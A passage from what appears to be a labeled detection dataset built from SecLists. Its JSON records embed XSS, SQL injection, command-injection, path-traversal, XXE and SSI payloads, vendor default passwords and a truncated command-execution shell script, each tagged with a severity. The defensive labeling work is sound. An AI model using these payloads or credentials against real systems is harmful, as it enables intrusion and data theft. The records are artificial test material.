-->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"DOCUMENT_NAME\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00541", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '*|';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*|", "injection_type": "SQL"}}]} {"id": "seclists_00542", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TMPVMS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TMPVMS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_00543", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &#13;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#13;", "injection_type": "cmd"}}]} {"id": "seclists_00544", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: ';alert(0)//\\';alert(1)//\";alert(2)//\\\";alert(3)//--></SCRIPT>\">'><SCRIPT>alert(4)</SCRIPT>=&{}\");}alert(6);function xss(){// HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: ';alert(0)//\\';alert(1)//\";alert(2)//\\\";alert(3)//--></SCRIPT>\">'><SCRIPT>alert(4)</SCRIPT>=&{}\");}alert(6);function xss(){//", "injection_type": "XSS"}}]} {"id": "seclists_00545", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:fellow@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "fellow"}}]} {"id": "seclists_00546", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Yuxin,User,1234,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Yuxin,User,1234,"}}]} {"id": "seclists_00547", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ../../../../../../../../../../../../etc/shadow%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "../../../../../../../../../../../../etc/shadow%00", "injection_type": "cmd"}}]} {"id": "seclists_00548", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">", "injection_type": "XSS"}}]} {"id": "seclists_00549", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"path\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"path\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00550", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<center onmouseout=\"alert(1)\">test</center>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<center onmouseout=\"alert(1)\">test</center>", "injection_type": "XSS"}}]} {"id": "seclists_00551", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>", "injection_type": "XSS"}}]} {"id": "seclists_00552", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=__proto__ stored JS alert HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "__proto__ stored JS alert", "injection_type": "XSS"}}]} {"id": "seclists_00553", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><noframes draggable=\"true\" ondragleave=\"alert(1)\">test</noframes></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<noframes draggable=\"true\" ondragleave=\"alert(1)\">test</noframes>", "injection_type": "XSS"}}]} {"id": "seclists_00554", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin'/* HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin'/*", "injection_type": "SQL"}}]} {"id": "seclists_00555", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">", "injection_type": "XSS"}}]} {"id": "seclists_00556", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = %7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C", "injection_type": "SQL"}}]} {"id": "seclists_00557", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Allied Telesyn,<N/A>,admin,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Allied Telesyn,<N/A>,admin,"}}]} {"id": "seclists_00558", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>@keyframes x{}</style><acronym style=\"animation-name:x\" onanimationstart=\"alert(1)\"></acronym></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><acronym style=\"animation-name:x\" onanimationstart=\"alert(1)\"></acronym>", "injection_type": "XSS"}}]} {"id": "seclists_00559", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or 0=0 #\"';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 0=0 #\"", "injection_type": "SQL"}}]} {"id": "seclists_00560", "source": "seclists", "source_license": "MIT", "text": "filename=&#X0003C;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X0003C;", "injection_type": "cmd"}}]} {"id": "seclists_00561", "source": "seclists", "source_license": "MIT", "text": "filename=%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_00562", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = union select 1,load_file('/etc/passwd'),1,1,1;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "union select 1,load_file('/etc/passwd'),1,1,1;", "injection_type": "SQL"}}]} {"id": "seclists_00563", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin' or '1'='1'-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin' or '1'='1'--", "injection_type": "SQL"}}]} {"id": "seclists_00564", "source": "seclists", "source_license": "MIT", "text": "username=or 1=1&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1=1", "injection_type": "SQL"}}]} {"id": "seclists_00565", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Lucent,Administrator,<BLANK>,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Lucent,Administrator,<BLANK>,"}}]} {"id": "seclists_00566", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=a);/usr/bin/id HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a);/usr/bin/id", "injection_type": "cmd"}}]} {"id": "seclists_00567", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:quality@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "quality"}}]} {"id": "seclists_00568", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: <IMG SRC=javascript:alert(String.fromCharCode(88###83###83))></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <IMG SRC=javascript:alert(String.fromCharCode(88###83###83))>", "injection_type": "XSS"}}]} {"id": "seclists_00569", "source": "seclists", "source_license": "MIT", "text": "#!/bin/sh\n#\n# SH_KIT\n#\n# cmd.sh = Command Execution\n#\n# by: Ludoz\n# modified: 23/04/2004\n#\n# Version 1.2 - 28/5/2003\n#\n\n###\n###\n### Configuracion\n###\n###\n\n#\n# sitios donde buscar ejecutables necesarios, sin la / posterior, separados por espacios\n#\nPATHS=\"/bin /usr/bin /sbin /usr/sbin /usr/local/bin /usr/local/sbin /usr/ucb /usr/libexec /tmp /usr/tmp /var/tmp .\"\n\n###\n###\n### La configuracion acaba aqui\n###\n###\n\n#\n# PATHs mas habituales de los 3 comandos base\n#\nTEST=\"/usr/bin/test\"\nBASENAME=\"/bin/basename\"\nDIRNAME=\"/usr/bin/dirname\"\n\n# compruebo TEST, BASENAME y DIRNAME y si estan mal intento encontrarlas en el path y sino en PATHS\nif (eval $TEST \\\"1\\\" = \\\"1\\\" ); then\n TEST=$TEST\nelse\n for i in $PATHS ; do\n TEST=\"$i/test\"\n if (eval $TEST \\\"1\\\" = \\\"1\\\" ); then\n break\n fi\n done\n if (eval $TEST \\\"1\\\" = \\\"1\\\" ); then\n TEST=$TEST\n else\n TEST=test\n if (eval $TEST \\\"1\\\" = \\\"1\\\" ); then\n TEST=$TEST\n else\n TEST=\"\"\n echo ERROR: No he encontrado TEST en el sitio especificado ni en el path\n echo\n exit\n fi\n fi\nfi\n\nif (eval $TEST \\\"`eval $BASENAME .`\\\" = \\\".\\\" ); then\n BASENAME=$BASENAME\nelse\n for i in $PATHS ; do\n BASENAME=\"$i/basename\"\n if (eval $TEST \\\"`eval $BASENAME .`\\\" = \\\".\\\" ); then\n break\n fi\n done\n if (eval $TEST \\\"`eval $BASENAME .`\\\" = \\\".\\\" ); then\n BASENAME=$BASENAME\n else\n BASENAME=basename\n if (eval $TEST \\\"`eval $BASENAME .`\\\" = \\\".\\\" ); then\n BASENAME=$BASENAME\n else\n BASENAME=\"\"\n echo ERROR: No he encontrado BASENAME en el sitio especificado ni en el path\n echo\n exit\n fi\n fi\nfi\n\nif (eval $TEST \\\"`eval $DIRNAME .`\\\" = \\\".\\\" ); then\n DIRNAME=$DIRNAME\nelse\n for i in $PATHS ; do\n DIRNAME=\"$i/dirname\"\n if (eval $TEST \\\"`eval $DIRNAME .`\\\" = \\\".\\\" ); then\n break\n fi\n done\n if (eval $TEST \\\"`eval $DIRNAME .`\\\" = \\\".\\\" ); then\n DIRNAME=$DIRNAME\n else\n DIRNAME=dirname\n if (eval $TEST \\\"`eval $DIRNAME .`\\\" = \\\".\\\" ); then\n DIRNAME=$DIRNAME\n else\n DIRNAME=\"\"\n echo ERROR: No he encontrado DIRNAME en el sitio especificado ni en el path\n echo\n exit\n fi\n fi\nfi\n\n#echo \"Info: TEST: $TEST\"\n#echo \"Info: BASENAME: $BASENAME\"\n#echo \"Info: DIRNAME: $DIRNAME\"\n\nif (eval $TEST -x \\\"/usr/bin/unalias\\\" ); then\n # si existe el comando: unalias *\n /usr/bin/unalias *\nelse\n # si es interno: unalias -a\n unalias -a\nfi\n\n#\n# A partir de aqui deberia ser 100% multisistema\n#\n\nbuscaexec ()\n{\nBUSCAEXECRES=\"\"\nif (eval $TEST -z \\\"$BUSCAEXECPAR\\\" ); then\n return;\nfi\nif (eval $TEST -x \\\"$BUSCAEXECPAR\\\" ); then\n BUSCAEXECRES=$BUSCAEXECPAR\n return;\nfi\n\nBUSCAEXECPAR=`eval $BASENAME $BUSCAEXECPAR`\n\nfor i in $PATHS $PATH ; do \n if (eval $TEST -x \\\"$i/$BUSCAEXECPAR\\\" ); then\n BUSCAEXECRES=\"$i/$BUSCAEXECPAR\"\n break\n fi\ndone\n\nif (eval $TEST -n \\\"$BUSCAEXECRES\\\" ); then\n return;\nfi\n\nif (eval $TEST -z \\\"$WHICH\\\" ); then\n return;\nfi\n\nBUSCAEXECRES=`eval $WHICH $BUSCAEXECPAR`\nif (eval $TEST -n \\\"$BUSCAEXECRES\\\" ); then\n if (eval $TEST ! -x \\\"$BUSCAEXECRES\\\" ); then\n BUSCAEXECRES=\"\"\n fi\nfi\n}\n\n\n#\n# Definicion de comandos concretos para el script\n#\n\nWHICH=\"\"\nBUSCAEXECPAR=/usr/bin/which\nbuscaexec\nWHICH=$BUSCAEXECRES\n\nif (eval $TEST -z \\\"$WHICH\\\" ) ; then\n if (eval $TEST \\\"$TEST\\\" != \\\"test\\\" ) ; then\n TESTCMD=$TEST\n TESTRES=\"test\"\n elif (eval $TEST \\\"$BASENAME\\\" != \\\"basename\\\" ) ; then\n TESTCMD=$BASENAME\n TESTRES=\"basename\"\n elif (eval $TEST \\\"$BASEDIR\\\" != \\\"basedir\\\" ) ; then\n TESTCMD=$BASEDIR\n TESTRES=\"basename\"\n fi\n\n if (eval $TEST -n \\\"$TESTCMD\\\"); then\n OLDPATH=$PATH\n \n TESTPATH=\"`eval $BASEDIR $TESTCMD`\"\n PATH=\"$TESTPATH:$PATH\"\n TESTPATH=\"\"\n PRUEBA=\"`eval $BASENAME \\\"\\`which $TESTRES\\`\\\" `\"\n if (eval $TEST \\\"$PRUEBA\\\" = \\\"TESTRES\\\" ) ; then\n WHICH=\"`which which`\"\n else\n WHICH=\"\"\n fi\n PRUEBA=\"\"\n\n PATH=$OLDPATH\n OLDPATH=\"\"\n TESTRES=\"\"\n TESTCMD=\"\"\n fi\n\nfi\n\nBUSCAEXECPAR=/bin/echo\nbuscaexec\nECHO=$BUSCAEXEC", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "sh", "filename": "cmd.sh"}}]} {"id": "seclists_00570", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host='&&echo%20SXUJKT$((94%2B38))$(echo%20SXUJKT)SXUJKT%22 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'&&echo%20SXUJKT$((94%2B38))$(echo%20SXUJKT)SXUJKT%22", "injection_type": "cmd"}}]} {"id": "seclists_00571", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#000060; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#000060;", "injection_type": "cmd"}}]} {"id": "seclists_00572", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ')print(`echo%20VHLBFA\\necho%20$((78%2B60))\\necho%20VHLBFA\\necho%20VHLBFA`)%3B%25252529%2525257DVHLBFA", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "')print(`echo%20VHLBFA\\necho%20$((78%2B60))\\necho%20VHLBFA\\necho%20VHLBFA`)%3B%25252529%2525257DVHLBFA", "injection_type": "cmd"}}]} {"id": "seclists_00573", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=%20$(sleep%2050) HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20$(sleep%2050)", "injection_type": "SQL"}}]} {"id": "seclists_00574", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: .mario\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: .mario", "injection_type": "XSS"}}]} {"id": "seclists_00575", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:\"Hyperic, Inc.\",hqadmin,hqadmin,http://support.hyperic.com/display/DOC/QuickStart+Installation@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "\"Hyperic, Inc.\",hqadmin,hqadmin,http://support.hyperic.com/display/DOC/QuickStart+Installation"}}]} {"id": "seclists_00576", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &#X3c;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X3c;", "injection_type": "cmd"}}]} {"id": "seclists_00577", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:CipherTrust,admin,password,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "CipherTrust,admin,password,"}}]} {"id": "seclists_00578", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: ha.ckers.org\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_00579", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Author Name: ha.ckers.org</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_00580", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ; execute immediate 'sel' || 'ect us' || 'er'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "; execute immediate 'sel' || 'ect us' || 'er'", "injection_type": "SQL"}}]} {"id": "seclists_00581", "source": "seclists", "source_license": "MIT", "text": "filename=<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>", "injection_type": "cmd"}}]} {"id": "seclists_00582", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ?x=|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "?x=|", "injection_type": "cmd"}}]} {"id": "seclists_00583", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<body onkeyup=\"alert(1)\" contenteditable>test</body>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body onkeyup=\"alert(1)\" contenteditable>test</body>", "injection_type": "XSS"}}]} {"id": "seclists_00584", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=getsome\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "getsome"}}]} {"id": "seclists_00585", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0aecho%20KEARQO$((52%2B94))$(echo%20KEARQO)KEARQO%7C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0aecho%20KEARQO$((52%2B94))$(echo%20KEARQO)KEARQO%7C", "injection_type": "cmd"}}]} {"id": "seclists_00586", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<ruby onbeforepaste=\"alert(1)\" contenteditable>test</ruby>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<ruby onbeforepaste=\"alert(1)\" contenteditable>test</ruby>", "injection_type": "XSS"}}]} {"id": "seclists_00587", "source": "seclists", "source_license": "MIT", "text": "filename=<>\"'%;)(&+", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<>\"'%;)(&+", "injection_type": "cmd"}}]} {"id": "seclists_00588", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: PHPIDS Group HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: PHPIDS Group", "injection_type": "XSS"}}]} {"id": "seclists_00589", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Telus,(created),telus00,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Telus,(created),telus00,"}}]} {"id": "seclists_00590", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<script src=javascript:alert(1)>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<script src=javascript:alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_00591", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Prime,guest1,guest1,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Prime,guest1,guest1,"}}]} {"id": "seclists_00592", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %26%20sleep%200%20%26%26%20str%3D%24%28echo%20QTRMRJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QTRMRJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C", "injection_type": "cmd"}}]} {"id": "seclists_00593", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>META w/additional URL parameter</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "META w/additional URL parameter", "injection_type": "XSS"}}]} {"id": "seclists_00594", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><td onmouseenter=\"alert(1)\">test</td></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<td onmouseenter=\"alert(1)\">test</td>", "injection_type": "XSS"}}]} {"id": "seclists_00595", "source": "seclists", "source_license": "MIT", "text": "password: Digital Equipment,manager,manager,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Digital Equipment,manager,manager,"}}]} {"id": "seclists_00596", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <body onload=a1={x:this.parent.document};a1.x.writeln(1);>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <body onload=a1={x:this.parent.document};a1.x.writeln(1);>", "injection_type": "XSS"}}]} {"id": "seclists_00597", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><x o%6Exxx=1</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x o%6Exxx=1", "injection_type": "XSS"}}]} {"id": "seclists_00598", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///c:/boot.ini\" >]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///c:/boot.ini\" >]>", "injection_type": "XXE"}}]} {"id": "seclists_00599", "source": "seclists", "source_license": "MIT", "text": "filename=' or 0=0 --", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or 0=0 --", "injection_type": "cmd"}}]} {"id": "seclists_00600", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=thx1138\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "thx1138"}}]} {"id": "seclists_00601", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<svg><meta onload=alert(1)></meta> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg><meta onload=alert(1)></meta>", "injection_type": "XSS"}}]} {"id": "seclists_00602", "source": "seclists", "source_license": "MIT", "text": "password: IBM,SYSWRM,<BLANK>,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IBM,SYSWRM,<BLANK>,"}}]} {"id": "seclists_00603", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<script>alert(1)<!\u2013\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<script>alert(1)<!\u2013", "injection_type": "XSS"}}]} {"id": "seclists_00604", "source": "seclists", "source_license": "MIT", "text": "filename=`ping 127.0.0.1`", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "`ping 127.0.0.1`", "injection_type": "cmd"}}]} {"id": "seclists_00605", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %3Becho$IFSBJQYNU$((71%2B12))$(echo$IFSBJQYNU)BJQYNU|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Becho$IFSBJQYNU$((71%2B12))$(echo$IFSBJQYNU)BJQYNU|", "injection_type": "cmd"}}]} {"id": "seclists_00606", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=/ HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/", "injection_type": "SQL"}}]} {"id": "seclists_00607", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=\"><img src=1 onerror=alert(1)>.gif HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"><img src=1 onerror=alert(1)>.gif", "injection_type": "XSS"}}]} {"id": "seclists_00608", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:abby", "findings": [{"category": "credentials", 